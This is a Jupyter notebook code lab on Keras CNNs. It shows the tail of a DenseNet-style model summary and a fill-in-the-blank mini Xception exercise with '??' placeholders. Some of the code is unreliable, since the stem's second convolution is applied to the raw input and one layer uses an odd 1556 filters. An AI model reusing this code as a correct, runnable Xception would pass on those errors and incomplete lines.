conv2d_350 (Conv2D) (None, 7, 7, 32) 36896 re_lu_349[0][0]
__________________________________________________________________________________________________
batch_normalization_350 (BatchN (None, 7, 7, 32) 128 conv2d_350[0][0]
__________________________________________________________________________________________________
re_lu_350 (ReLU) (None, 7, 7, 32) 0 batch_normalization_350[0][0]
__________________________________________________________________________________________________
concatenate_169 (Concatenate) (None, 7, 7, 864) 0 concatenate_168[0][0]
re_lu_350[0][0]
__________________________________________________________________________________________________
conv2d_351 (Conv2D) (None, 7, 7, 128) 110720 concatenate_169[0][0]
__________________________________________________________________________________________________
batch_normalization_351 (BatchN (None, 7, 7, 128) 512 conv2d_351[0][0]
__________________________________________________________________________________________________
re_lu_351 (ReLU) (None, 7, 7, 128) 0 batch_normalization_351[0][0]
__________________________________________________________________________________________________
conv2d_352 (Conv2D) (None, 7, 7, 32) 36896 re_lu_351[0][0]
__________________________________________________________________________________________________
batch_normalization_352 (BatchN (None, 7, 7, 32) 128 conv2d_352[0][0]
__________________________________________________________________________________________________
re_lu_352 (ReLU) (None, 7, 7, 32) 0 batch_normalization_352[0][0]
__________________________________________________________________________________________________
concatenate_170 (Concatenate) (None, 7, 7, 896) 0 concatenate_169[0][0]
re_lu_352[0][0]
__________________________________________________________________________________________________
conv2d_353 (Conv2D) (None, 7, 7, 128) 114816 concatenate_170[0][0]
__________________________________________________________________________________________________
batch_normalization_353 (BatchN (None, 7, 7, 128) 512 conv2d_353[0][0]
__________________________________________________________________________________________________
re_lu_353 (ReLU) (None, 7, 7, 128) 0 batch_normalization_353[0][0]
__________________________________________________________________________________________________
conv2d_354 (Conv2D) (None, 7, 7, 32) 36896 re_lu_353[0][0]
__________________________________________________________________________________________________
batch_normalization_354 (BatchN (None, 7, 7, 32) 128 conv2d_354[0][0]
__________________________________________________________________________________________________
re_lu_354 (ReLU) (None, 7, 7, 32) 0 batch_normalization_354[0][0]
__________________________________________________________________________________________________
concatenate_171 (Concatenate) (None, 7, 7, 928) 0 concatenate_170[0][0]
re_lu_354[0][0]
__________________________________________________________________________________________________
conv2d_355 (Conv2D) (None, 7, 7, 128) 118912 concatenate_171[0][0]
__________________________________________________________________________________________________
batch_normalization_355 (BatchN (None, 7, 7, 128) 512 conv2d_355[0][0]
__________________________________________________________________________________________________
re_lu_355 (ReLU) (None, 7, 7, 128) 0 batch_normalization_355[0][0]
__________________________________________________________________________________________________
conv2d_356 (Conv2D) (None, 7, 7, 32) 36896 re_lu_355[0][0]
__________________________________________________________________________________________________
batch_normalization_356 (BatchN (None, 7, 7, 32) 128 conv2d_356[0][0]
__________________________________________________________________________________________________
re_lu_356 (ReLU) (None, 7, 7, 32) 0 batch_normalization_356[0][0]
__________________________________________________________________________________________________
concatenate_172 (Concatenate) (None, 7, 7, 960) 0 concatenate_171[0][0]
re_lu_356[0][0]
__________________________________________________________________________________________________
conv2d_357 (Conv2D) (None, 7, 7, 128) 123008 concatenate_172[0][0]
__________________________________________________________________________________________________
batch_normalization_357 (BatchN (None, 7, 7, 128) 512 conv2d_357[0][0]
__________________________________________________________________________________________________
re_lu_357 (ReLU) (None, 7, 7, 128) 0 batch_normalization_357[0][0]
__________________________________________________________________________________________________
conv2d_358 (Conv2D) (None, 7, 7, 32) 36896 re_lu_357[0][0]
__________________________________________________________________________________________________
batch_normalization_358 (BatchN (None, 7, 7, 32) 128 conv2d_358[0][0]
__________________________________________________________________________________________________
re_lu_358 (ReLU) (None, 7, 7, 32) 0 batch_normalization_358[0][0]
__________________________________________________________________________________________________
concatenate_173 (Concatenate) (None, 7, 7, 992) 0 concatenate_172[0][0]
re_lu_358[0][0]
__________________________________________________________________________________________________
conv2d_359 (Conv2D) (None, 7, 7, 128) 127104 concatenate_173[0][0]
__________________________________________________________________________________________________
batch_normalization_359 (BatchN (None, 7, 7, 128) 512 conv2d_359[0][0]
__________________________________________________________________________________________________
re_lu_359 (ReLU) (None, 7, 7, 128) 0 batch_normalization_359[0][0]
__________________________________________________________________________________________________
conv2d_360 (Conv2D) (None, 7, 7, 32) 36896 re_lu_359[0][0]
__________________________________________________________________________________________________
batch_normalization_360 (BatchN (None, 7, 7, 32) 128 conv2d_360[0][0]
__________________________________________________________________________________________________
re_lu_360 (ReLU) (None, 7, 7, 32) 0 batch_normalization_360[0][0]
__________________________________________________________________________________________________
concatenate_174 (Concatenate) (None, 7, 7, 1024) 0 concatenate_173[0][0]
re_lu_360[0][0]
__________________________________________________________________________________________________
global_average_pooling2d_3 (Glo (None, 1024) 0 concatenate_174[0][0]
__________________________________________________________________________________________________
dense_3 (Dense) (None, 1000) 1025000 global_average_pooling2d_3[0][0]
==================================================================================================
Total params: 7,946,408
Trainable params: 7,925,928
Non-trainable params: 20,480
__________________________________________________________________________________________________
```
```
model.summary()
```
## Xception Architecture using Functional API
Let's layout a CNN using the Xception architecture pattern.
We will use these approaches:
1. Decompose into a stem, entrance, middle and exit module.
2. Stem does the initial sequential convolutional layers for the input.
3. Entrance does the coarse filter learning.
4. Middle does the detail filter learning.
5. Exit does the classification.
We won't build a full Xception, just a mini-example to practice the layout.
You will need to:
1. Use a strided convolution in the stem group.
2. Set the number of residual blocks in the residual groups in the middle flow.
3. Use global averaging in the classifier.
4. Set the input to the project link in the residual blocks in the entry flow.
5. Remember the input to the residual blocks in the middle flow.
```
from keras import layers, Input, Model
def entryFlow(inputs):
""" Create the entry flow section
inputs : input tensor to neural network
"""
def stem(inputs):
""" Create the stem entry into the neural network
inputs : input tensor to neural network
"""
# The stem uses two 3x3 convolutions.
# The first one downsamples and the second one doubles the number of filters
# First convolution
x = layers.Conv2D(32, (3, 3), strides=(2, 2))(inputs)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Second convolution, double the number of filters (no downsampling)
# HINT: when stride > 1 you are downsampling (also known as strided convolution)
x = layers.Conv2D(??, (3, 3), strides=??)(inputs)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
return x
# Create the stem to the neural network
x = stem(inputs)
# Create three residual blocks
for nb_filters in [128, 256, 728]:
x = residual_block_entry(x, nb_filters)
return x
def middleFlow(x):
""" Create the middle flow section
x : input tensor into section
"""
# Create 8 residual blocks, each with 728 filters
for _ in range(8):
x = residual_block_middle(x, ??)
return x
def exitFlow(x):
""" Create the exit flow section
x : input tensor into section
"""
def classifier(x):
""" The output classifier
x : input tensor
"""
# Global Average Pooling will flatten the 10x10 feature maps into 1D
# feature maps
x = layers.??()(x)
# Fully connected output layer (classification)
x = layers.Dense(1000, activation='softmax')(x)
return x
shortcut = x
# First Depthwise Separable Convolution
x = layers.SeparableConv2D(728, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
# Second Depthwise Separable Convolution
x = layers.SeparableConv2D(1024, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Create pooled feature maps, reduce size by 75%
x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)
# Add strided convolution to identity link to double number of filters to
# match output of residual block for the add operation
shortcut = layers.Conv2D(1024, (1, 1), strides=(2, 2),
padding='same')(shortcut)
shortcut = layers.BatchNormalization()(shortcut)
x = layers.add([x, shortcut])
# Third Depthwise Separable Convolution
x = layers.SeparableConv2D(1556, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Fourth Depthwise Separable Convolution
x = layers.SeparableConv2D(2048, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Create classifier section
x = classifier(x)
return x
def residual_block_entry(x, nb_filters):
""" Create a residual block using Depthwise Separable Convolutions
x : input into residual block
nb_filters: number of filters
"""
shortcut = x
# First Depthwise Separable Convolution
x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Second depthwise Separable Convolution
x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Create pooled feature maps, reduce size by 75%
x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)
# Add strided convolution to identity link to double number of filters to
# match output of residual block for the add operation
# HINT: this is the identity branch, so what should be the input?
shortcut = layers.Conv2D(nb_filters, (1, 1), strides=(2, 2),
padding='same')(??)
shortcut = layers.BatchNormalization()(shortcut)
x = layers.add([x, shortcut])
return x
def residual_block_middle(x, nb_filters):
""" Create a residual block using Depthwise Separable Convolutions
x : input into residual block
nb_filters: number of filters
"""
# Remember to save the input for the identity link
# HINT: it's in the params!
shortcut = ??
# First Depthwise Separable Convolution
x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Second depthwise Separable Convolution
x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Third depthwise Separable Convolution
x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
x = layers.add([x, shortcut])
return x
inputs = Input(shape=(299, 299, 3))
# Create entry section
x = entryFlow(inputs)
# Create the middle section
x = middleFlow(x)
# Create the exit section
outputs = exitFlow(x)
model = Model(inputs, outputs)
```
### Verify the model architecture using summary method
It should look (end) like below:
```
global_average_pooling2d_1 (Glo (None, 2048) 0 re_lu_37[0][0]
__________________________________________________________________________________________________
dense_1 (Dense) (None, 1000) 2049000 global_average_pooling2d_1[0][0]
==================================================================================================
Total params: 22,981,736
Trainable params: 22,927,232
Non-trainable params: 54,504
```
```
model.summary()
```
## End of Code Lab
|
github_jupyter
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.